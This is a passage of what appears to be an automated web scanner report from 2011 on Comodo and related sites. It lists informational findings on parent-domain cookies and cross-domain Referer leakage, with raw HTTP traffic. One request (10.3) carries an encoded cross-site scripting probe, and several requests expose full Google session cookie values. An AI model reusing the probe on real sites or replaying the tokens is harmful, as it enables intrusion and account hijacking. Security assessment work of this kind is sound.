Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>Anti Phishing Site
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

10. Cookie scoped to parent domain  previous  next
There are 3 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


10.1. http://apis.google.com/js/plusone.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apis.google.com
Path:   /js/plusone.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plusone.js HTTP/1.1
Host: apis.google.com
Proxy-Connection: keep-alive
Referer: http://www.fusemail.com/products/spam-and-virus-filtering/request-more-information/?utm_source=j2&utm_medium=crosssell&utm_campaign=enterprisepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=mCI0VZozMcVtfOnsXPWKRIg4CFYHD91WLLi_uPVaxjIGdNNCCPTpbb-Y6ItlcrUaFRZ1_uYF76XD4xG_aXDqKnNnWckAgZKDE_tqIYZX_5tTbL1lkWSJHXddkQriOGGX; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjraOk0NnKnon18FmQ0anHqw5G5b8D7UKVV-fvoBa-B7nHUAI1yJPXkeoZPmNzpO5TVyyzlW1fNxwBHtH2HmDETt4jQdxjCyPqZ0_Mz1dsplqhrmR2JS56T55_h5iz2URKMamLZkIdrgZB_dQvqVSloGJgky-ppUKdS0uO8737_ewtjmsYtlOysbxj00Pjud9F-PuoMEpszT-bzZhHJBEZepn0S0pmDxxr7KidOd1oXi21FARDUcsfI_WLw-qAvsGbFgIXIj_A7xnaM4KZLe8U31tgLzYqwxvP5awMCzfx50c

Response

HTTP/1.1 200 OK
Set-Cookie: SID=DQAAAPAAAAD7Xl0oDS_3Xy0JKwYeKgRj5Y_McDPpUTRM70c1_kfRaM0t1NIGOeKymCZf_GkU6cxXYEHblQwAvGR_WSjcMuxkvK3WyncNjjtSf5BO7OMdVM8V2NjhVDXfhMJ6l8gPKEvJNy95-i_R-RDOyY0ADU6-pKSHuPOnJlY5NCKau5HhqlG4rtz9dlPp2-RUQ0e00xAg-03wDCA5Aya4w2pvz_sx9PKUz4Z_p_7XpMhOQPpQoHjbly5_fRWrgbicqscZk4n9CAAkmJfJLiLOih9pzf-hVx55GXF4ceDiaulA2MQUbxeqBsxvSi3H3-auSOBF0i8;Domain=.google.com;Path=/;Expires=Wed, 15-Sep-2021 12:19:27 GMT
Content-Type: text/javascript; charset=utf-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Expires: Sun, 18 Sep 2011 12:19:27 GMT
Date: Sun, 18 Sep 2011 12:19:27 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 5519

window.___jsl=window.___jsl||{};
window.___jsl.h=window.___jsl.h||'r;gc\/23803279-4555db52';
window.___jsl.l=[];
window.__GOOGLEAPIS=window.__GOOGLEAPIS||{};
window.__GOOGLEAPIS.gwidget=window.__GOOGL
...[SNIP]...

10.2. http://id.google.com/verify/EAAAAJ59_TqDCWw9F_a-CecOvJE.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAJ59_TqDCWw9F_a-CecOvJE.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAJ59_TqDCWw9F_a-CecOvJE.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=comodo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=51=5jDNJdHYl6hy7G524Hsvf3N5RrNMBaTwe5ZLSn6kJw=6lUY77-PJ0uhtb3y; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=mCI0VZozMcVtfOnsXPWKRIg4CFYHD91WLLi_uPVaxjIGdNNCCPTpbb-Y6ItlcrUaFRZ1_uYF76XD4xG_aXDqKnNnWckAgZKDE_tqIYZX_5tTbL1lkWSJHXddkQriOGGX; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjraOk0NnKnon18FmQ0anHqw5G5b8D7UKVV-fvoBa-B7nHUAI1yJPXkeoZPmNzpO5TVyyzlW1fNxwBHtH2HmDETt4jQdxjCyPqZ0_Mz1dsplqhrmR2JS56T55_h5iz2URKMamLZkIdrgZB_dQvqVSloGJgky-ppUKdS0uO8737_ewtjmsYtlOysbxj00Pjud9F-PuoMEpszT-bzZhHJBEZepn0S0pmDxxr7KidOd1oXi21FARDUcsfI_WLw-qAvsGbFgIXIj_A7xnaM4KZLe8U31tgLzYqwxvP5awMCzfx50c

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=51=OBRz60dp-DT3RAGbzX_UkT2S5miM5xizmspOAgxE4g=j_IIDIbd7xiwAAO8; expires=Mon, 19-Mar-2012 01:49:33 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sun, 18 Sep 2011 01:49:33 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.3. http://www.bizographics.com/collect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /collect/?pid=749&url=http%3A%2F%2Fwww.govinfosecurity.com%2Farticles.php%3Fart_id%3D4067%26ceb4a%2527%253E%253Cscript%253Ealert(document.location)%253C%2Fscript%253Eae00085e7e2%3D1&pageUrl=http%3A%2F%2Fwww.govinfosecurity.com%2Farticles.php%3Fart_id%3D4067%26ceb4a%2527%253E%253Cscript%253Ealert(document.location)%253C%2Fscript%253Eae00085e7e2%3D1&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&time=1316366252200 HTTP/1.1
Host: www.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.govinfosecurity.com/articles.php?art_id=4067&ceb4a%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eae00085e7e2=1
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sun, 18 Sep 2011 12:16:27 GMT
Server: nginx/0.7.61
Set-Cookie: BizographicsID=""; Domain=.bizographics.com; Expires=Sun, 18-Sep-2011 12:16:28 GMT; Path=/
Set-Cookie: BizoID=""; Domain=.bizographics.com; Expires=Sun, 18-Sep-2011 12:16:28 GMT; Path=/
Set-Cookie: BizoData=""; Domain=.bizographics.com; Expires=Sun, 18-Sep-2011 12:16:28 GMT; Path=/
Set-Cookie: BizoCustomSegments=""; Domain=.bizographics.com; Expires=Sun, 18-Sep-2011 12:16:28 GMT; Path=/
Set-Cookie: BizographicsOptOut=OPT_OUT; Domain=.bizographics.com; Expires=Fri, 16-Sep-2016 12:16:27 GMT; Path=/
Content-Length: 9
Connection: keep-alive

//opt out

11. Cross-domain Referer leakage  previous  next
There are 439 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


11.1. http://antivirus.comodo.com/antivirus_download.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /antivirus_download.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /antivirus_download.php?af=1165 HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:04:12 GMT
Content-Type: text/html
Connection: close
Content-Length: 21137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.2. http://antivirus.comodo.com/cis-pro_download.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /cis-pro_download.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cis-pro_download.php?af=1164 HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:04:14 GMT
Content-Type: text/html
Connection: close
Content-Length: 28667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.3. http://antivirus.comodo.com/click-track/BTTN/SLIDER/AV  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/BTTN/SLIDER/AV

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /click-track/BTTN/SLIDER/AV?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:17 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.4. http://antivirus.comodo.com/click-track/BTTN/SLIDER/CompareProductsBestVirus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/BTTN/SLIDER/CompareProductsBestVirus

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /click-track/BTTN/SLIDER/CompareProductsBestVirus?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:18 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.5. http://antivirus.comodo.com/click-track/BTTN/SLIDER/LearnMoreCleanPC  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/BTTN/SLIDER/LearnMoreCleanPC

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /click-track/BTTN/SLIDER/LearnMoreCleanPC?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:19 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.6. http://antivirus.comodo.com/click-track/EXE/AV  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/EXE/AV

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /click-track/EXE/AV?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:39 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.7. http://antivirus.comodo.com/click-track/IMAGE/CompareAV  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/IMAGE/CompareAV

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /click-track/IMAGE/CompareAV?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:43 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.8. http://antivirus.comodo.com/click-track/IMAGE/logo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/IMAGE/logo

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /click-track/IMAGE/logo?pagelink=Global-Header HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:44 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.9. http://antivirus.comodo.com/click-track/LEAD/CAM/AAV-Buy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/LEAD/CAM/AAV-Buy

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /click-track/LEAD/CAM/AAV-Buy?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:22 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.10. http://antivirus.comodo.com/click-track/LEAD/CAM/AAV-Trail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/LEAD/CAM/AAV-Trail

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /click-track/LEAD/CAM/AAV-Trail?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:21 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.11. http://antivirus.comodo.com/click-track/LEAD/CAM/CIS-PRO-Buy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/LEAD/CAM/CIS-PRO-Buy

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /click-track/LEAD/CAM/CIS-PRO-Buy?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:24 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.12. http://antivirus.comodo.com/click-track/LEAD/CAM/CIS-PRO-Trail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/LEAD/CAM/CIS-PRO-Trail

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /click-track/LEAD/CAM/CIS-PRO-Trail?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:23 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.13. http://antivirus.comodo.com/click-track/LEAD/CAM/SLIDER/CIS-PRO  previous  next

Summary

Severity:   Information
Confidence:   Certain
